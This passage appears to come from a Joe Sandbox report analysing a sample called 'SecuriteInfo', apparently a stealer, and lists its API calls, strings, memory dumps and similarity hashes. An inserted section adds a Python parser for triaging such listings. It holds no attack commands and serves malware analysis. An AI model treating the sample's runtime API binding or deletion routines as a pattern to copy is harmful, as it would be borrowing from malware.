• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: AI_FRAME_NO_CAPTION_$Dialog$Pu$`Dialog` = '
• API String ID: 1385522511-2988394120
• Opcode ID: 4791ae00654cd30e295fac1d674411fc75f3d1321dd18d56be7137f98b776f93
• Instruction ID: bf558767bc73b88d8ae92f51f7926e582195414d1d9154fd9eafcb66484b6f41
• Opcode Fuzzy Hash: 4791ae00654cd30e295fac1d674411fc75f3d1321dd18d56be7137f98b776f93
• Instruction Fuzzy Hash: 67D1CF72A01208DFCB14CF79DD85B9EBBB5EF88310F14826AE515BB391D770A948CB51
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 00D0175A
  • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
• ResetEvent.KERNEL32(00000000,1FC3D414,?,?,00000000,00DF22FD,000000FF,?,80004005), ref: 00D017EF
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00DF22FD,000000FF,?,80004005), ref: 00D0180F
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00DF22FD,000000FF,?,80004005), ref: 00D0181A
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HeapInit_thread_footerObjectSingleWait$AllocDeleteEventFileFindProcessResetResource
                                                                                                                                                                        • String ID: TEST$tin9999.tmp
                                                                                                                                                                        • API String ID: 639690705-3424081289
                                                                                                                                                                        • Opcode ID: b2f6d0a1b12263aee54a8856074f252dd2c969d80e1afb15939cd11f646ae731
                                                                                                                                                                        • Instruction ID: e6559535274c5fc96dc232cd041381e5ae42ef7e7bdcc58f2955768e40f41a4c
                                                                                                                                                                        • Opcode Fuzzy Hash: b2f6d0a1b12263aee54a8856074f252dd2c969d80e1afb15939cd11f646ae731
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CC1E175901259EFDB14DF68CC05BAEB7B8FF45310F1482A9E81AA72D1DB709E04CBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,1FC3D414), ref: 00BCD3B1
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BCD3DA
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,00E1329C,00000000,00E1329C,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00BCD64E
                                                                                                                                                                        • CloseHandle.KERNEL32(?,1FC3D414,?,?,00000000,00DAC7CD,000000FF,?,00E1329C,00000000,00E1329C,00000000,?,80000001,00000001,00000000), ref: 00BCD6DE
                                                                                                                                                                        Strings
                                                                                                                                                                        • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00BCD412
                                                                                                                                                                        • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00BCD3A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$CreateErrorEventHandleLast
                                                                                                                                                                        • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                        • API String ID: 1253123496-2079760225
                                                                                                                                                                        • Opcode ID: eb3b4dafb4141e8199f3734241abc6d981cafec5754703cb81941a0b1b0fdb78
                                                                                                                                                                        • Instruction ID: d7b1cd2566fd80f6576b94ce7fced27b5e1976a4d85e7a682f7ecc67edf71a29
                                                                                                                                                                        • Opcode Fuzzy Hash: eb3b4dafb4141e8199f3734241abc6d981cafec5754703cb81941a0b1b0fdb78
                                                                                                                                                                        • Instruction Fuzzy Hash: 94C1AD70D00248DFDB14CF68CD45BAEBBF5EF55304F1082ADE459A7281DB74AA88CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC0814
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC0889
                                                                                                                                                                        • GetProcessHeap.KERNEL32(?,?), ref: 00BC08F9
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 00BC08FF
                                                                                                                                                                        • GetProcessHeap.KERNEL32(?,00000000,?,00000000,00000000,00000000,1FC3D414,00E2ADDC,00000000), ref: 00BC092C
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,1FC3D414,00E2ADDC,00000000), ref: 00BC0932
                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00BC094A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Free$Heap$String$Process
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2680101141-0
                                                                                                                                                                        • Opcode ID: db4a1333d2ae6c1f70f971cd92a8fc1f244bc91948a97dd410e49bfc9ea12009
                                                                                                                                                                        • Instruction ID: 339c31adf50b6e2097d32afc94fb5bd8ddd998616a0dc8ecc0d71d98c5b3d6ff
                                                                                                                                                                        • Opcode Fuzzy Hash: db4a1333d2ae6c1f70f971cd92a8fc1f244bc91948a97dd410e49bfc9ea12009
                                                                                                                                                                        • Instruction Fuzzy Hash: 9C811A7091021ADFEF11EFA8C845BAEBBF4FF05314F1445A9E454A7281D7B8AA04CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00CE2271,?,1FC3D414,?,?), ref: 00CD6E9B
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00CD6EB1
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00CD6EEA
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00CE2271,?,1FC3D414,?,?), ref: 00CD6F06
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$Free$AddressLoadProc
                                                                                                                                                                        • String ID: DllGetVersion$Shlwapi.dll
                                                                                                                                                                        • API String ID: 1386263645-2240825258
                                                                                                                                                                        • Opcode ID: 078fe49d0cddb6b29892fe478e2795c9d5516e66d38c999f5e49d34e823d5182
                                                                                                                                                                        • Instruction ID: 5c5f6b971848404e62a25f7af7f22e2822fdb115210cb74ba0658360d4fd44b7
                                                                                                                                                                        • Opcode Fuzzy Hash: 078fe49d0cddb6b29892fe478e2795c9d5516e66d38c999f5e49d34e823d5182
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D21D1726047058BD310AF29E841A6BB7E4FFDD701B80092EF589D3201EB36D94DC7A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00D99AEF,00D95FF3,0000000C,?,00000000,00000000,?,00D99D59,00000021,FlsSetValue,00E0CE7C,00E0CE84,?), ref: 00D99AA3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                        • Opcode ID: 6162c625f1b7995b270d33eefdd23190b12421fb6e97ad3a4805692fba75e7e1
                                                                                                                                                                        • Instruction ID: 845c336b7f691cafb991af84dda0820a996d6e62b054f38f509da7b9fa8ffebc
                                                                                                                                                                        • Opcode Fuzzy Hash: 6162c625f1b7995b270d33eefdd23190b12421fb6e97ad3a4805692fba75e7e1
                                                                                                                                                                        • Instruction Fuzzy Hash: D0213A31A01211AFDF219B6ADD60A5BB759EB417B0F380229E846F72E1DB30ED44C6F0
                                                                                                                                                                        Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D7D249,00D7D1AC,00D7D44D), ref: 00D7D1E5
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D7D1FB
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D7D210
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: 104a8605176785ded6ae580e36f7762ccf646156ea4ac908d45797372d30c010
• Instruction ID: a9c18ce6fc97c2e88d5012232440f028eed940897424832c39bd7355f78c5dbc
• Opcode Fuzzy Hash: 104a8605176785ded6ae580e36f7762ccf646156ea4ac908d45797372d30c010
• Instruction Fuzzy Hash: 94F0AF313523229F9B315F665D9566732EAAF0635031C903AE9C9F6281FE20CC8A97B4
Uniqueness

Uniqueness Score: -1.00%
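The listing above is the concrete pattern behind the report's "Contains functionality to dynamically determine API calls" signature: GetModuleHandleW on KERNEL32.DLL followed by GetProcAddress for AcquireSRWLockExclusive and ReleaseSRWLockExclusive. Triage usually needs this for every function in the report rather than one, so the following is an added example (not Joe Sandbox code and not code from the analysed sample): a parser for these per-function listings that extracts each call with its arguments, call-site address and nested "Part of subcall function" marker, keeps the strings with their xrefs and the Similarity fields, and reports which names a function binds at run time. SAMPLE is a constructed excerpt assembled from this report's own lines; the regexes assume the row layout shown on this page.

```python
"""Parse the per-function listings Joe Sandbox emits (the APIs / Strings /
Memory Dump Source / Similarity / Uniqueness blocks in this report) and flag
functions that bind APIs at run time. Added example, not Joe Sandbox code.
SAMPLE is a constructed excerpt assembled from lines of this report."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D7D249,00D7D1AC,00D7D44D), ref: 00D7D1E5
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D7D1FB
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D7D210
Strings
Memory Dump Source
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcsrchr.LIBVCRUNTIME ref: 00D11154
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
• DeleteFileW.KERNEL32(?), ref: 00D111FA
Strings
• --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 00D111AE
Similarity
• API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
Uniqueness Score: -1.00%
"""

ADDR = r"[0-9A-F]{8}"
# "• [Part of subcall function X: ]Api.MODULE[(args)], ref: addr"
API_RE = re.compile(rf"^•\s*(?:Part of subcall function ({ADDR}):\s*)?"
                    rf"([\w@?$]+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*({ADDR})$")
STRING_RE = re.compile(rf"^•\s*(.*),\s*xrefs:\s*({ADDR}(?:,\s*{ADDR})*)$")
KV_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")            # "• Key: value" rows
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[\d.]+)%")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
MODULE_LOADERS = {"GetModuleHandleW", "GetModuleHandleA", "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"}
HEX_OR_UNKNOWN = re.compile(rf"^(?:{ADDR}|\?)$")  # argument Joe could not recover as a string


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address
    subcall_of: str | None = None  # set for "Part of subcall function X" rows


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, list[str]]] = field(default_factory=list)  # (text, xrefs)
    dumps: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)
    uniqueness: float | None = None


def parse_blocks(text: str) -> list[FunctionBlock]:
    """One FunctionBlock per listing; a listing opens at 'APIs' and closes at its score."""
    blocks: list[FunctionBlock] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()            # the report indents rows heavily; drop that
        if not line:
            continue
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "APIs"
            continue
        if line in SECTIONS:
            section = line
            continue
        if cur is None:
            continue
        if m := SCORE_RE.match(line):
            cur.uniqueness = float(m.group(1))
            cur, section = None, None
        elif section == "APIs" and (m := API_RE.match(line)):
            sub, name, mod, args, ref = m.groups()
            cur.apis.append(ApiCall(name, mod, args.split(",") if args else [], ref, sub))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m.group(1), [x.strip() for x in m.group(2).split(",")]))
        elif section == "Memory Dump Source" and (m := KV_RE.match(line)):
            cur.dumps.append(m.group(2).removesuffix("Download File"))  # strip link residue
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.similarity[m.group(1)] = m.group(2)
    return blocks


def is_literal(arg: str) -> bool:
    return not HEX_OR_UNKNOWN.match(arg)


def resolved_import_names(block: FunctionBlock) -> list[str]:
    """Names handed to GetProcAddress: APIs bound at run time, not via the import table."""
    return [c.args[1] for c in block.apis
            if c.name == "GetProcAddress" and len(c.args) > 1 and is_literal(c.args[1])]


def loaded_modules(block: FunctionBlock) -> list[str]:
    return [c.args[0] for c in block.apis
            if c.name in MODULE_LOADERS and c.args and is_literal(c.args[0])]


def summarize(blocks: list[FunctionBlock]) -> list[dict]:
    """Per-function triage row: direct APIs, modules looked up, names resolved, strings."""
    return [{"index": i,
             "apis": sorted({c.name for c in b.apis if c.subcall_of is None}),
             "modules": loaded_modules(b),
             "resolved": resolved_import_names(b),
             "strings": [s for s, _ in b.strings],
             "uniqueness": b.uniqueness} for i, b in enumerate(blocks)]


if __name__ == "__main__":
    for row in summarize(parse_blocks(SAMPLE)):
        print(row)
```

Read the "resolved" column per function rather than the signature alone. Here the two names are the SRW-lock functions, which is the lookup the MSVC runtime's downlevel thunks perform so the image still loads on Windows versions that lack them, so this particular function is more plausibly runtime-library scaffolding than the stealer hiding its own imports; functions whose resolved names are networking, credential-store or process-manipulation APIs are the ones that deserve a closer look.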

APIs
• SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00BE69D7
• SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00BE69FF
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BE6A17
• SendMessageW.USER32(?,0000130A,00000000,?), ref: 00BE6A48
• GetParent.USER32(?), ref: 00BE6B24
• SendMessageW.USER32(00000000,00000136,?,?), ref: 00BE6B35
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend$Parent
• String ID:
• API String ID: 1020955656-0
• Opcode ID: f1351a788ab9b5e289228632e734ea1d3d28eb46a3a37a03631bbbbb770b2e48
• Instruction ID: 58d7b8f67bbeeed2757df68b03350e988cb12b6187310631e6a28751db83cc4f
• Opcode Fuzzy Hash: f1351a788ab9b5e289228632e734ea1d3d28eb46a3a37a03631bbbbb770b2e48
• Instruction Fuzzy Hash: 15613872924218AFDB219FE5CC49FAEBBB9FF48711F10411AF615BB2A0C7706949CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcsrchr.LIBVCRUNTIME ref: 00D11154
  • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
  • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
• DeleteFileW.KERNEL32(?), ref: 00D111FA
• _wcsrchr.LIBVCRUNTIME ref: 00D11269
• DeleteFileW.KERNEL32(?,?,?), ref: 00D1132F
  • Part of subcall function 00CD0270: LoadStringW.USER32(000000A1,?,00000514,1FC3D414), ref: 00CD01D6
Strings
• --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 00D111AE
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
• String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
• API String ID: 2702461799-3685554107
• Opcode ID: 1b93242c84cd324486242e71225b5ffdd83d3cd6d016eccc146effb5f299366a
• Instruction ID: a5ce5d3d5f006b7974c4c313ab69db4e7cc006c45c28c95d96c19f58bb4d5bd3
• Opcode Fuzzy Hash: 1b93242c84cd324486242e71225b5ffdd83d3cd6d016eccc146effb5f299366a
• Instruction Fuzzy Hash: 1191B231A00609AFDB00DBA8DC45B9EBBF5FF45314F188299E515DB292EB31D904CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 00BE685D
• SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00BE6872
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00BE687A
  • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
  • Part of subcall function 00BE84B0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BE84FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: MessageSend$AllocCreateHeapWindow
• String ID: SysTabControl32$TabHost
• API String ID: 4294867080-2872506973
• Opcode ID: 577999934969a01345be247a1de58718d424f834271833d725ee1263739e9484
• Instruction ID: fd569aed17f0b5090695fb4c43f429d5b74c9d411c6a45d635e6ac6e7e18c45d
• Opcode Fuzzy Hash: 577999934969a01345be247a1de58718d424f834271833d725ee1263739e9484
• Instruction Fuzzy Hash: EA51AD71A00605AFDB10DF69C844BAEBBF4FF49710F10429AF815AB390DB74AD04CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 00CCE1F7
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00CCE213
• GetExitCodeProcess.KERNEL32 ref: 00CCE224
• CloseHandle.KERNEL32(00000000), ref: 00CCE232
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
Similarity
• API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
• String ID: open
• API String ID: 2321548817-2758837156
• Opcode ID: 0bcef71a7455f998b8d3b35603a34bc50069bc50faebca4423a6d24936af871b
• Instruction ID: 45ed0f068b82d98783c5b0e9de3f8b9705c2626fe9afb352684470ee3c7c2f6b
• Opcode Fuzzy Hash: 0bcef71a7455f998b8d3b35603a34bc50069bc50faebca4423a6d24936af871b
• Instruction Fuzzy Hash: 4B615A71D006499FDB10CFA9C848BAEBBB4FF4A324F18425DE825AB3D1D7759A44CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.KERNEL32(00E9E7BC,1FC3D414,00000000,00E9E7D8), ref: 00BC8B63
• LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8BC8
• LoadCursorW.USER32(00BB0000,?), ref: 00BC8C24
• LeaveCriticalSection.KERNEL32(00E9E7BC), ref: 00BC8CBB
Strings
Memory Dump Source
• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
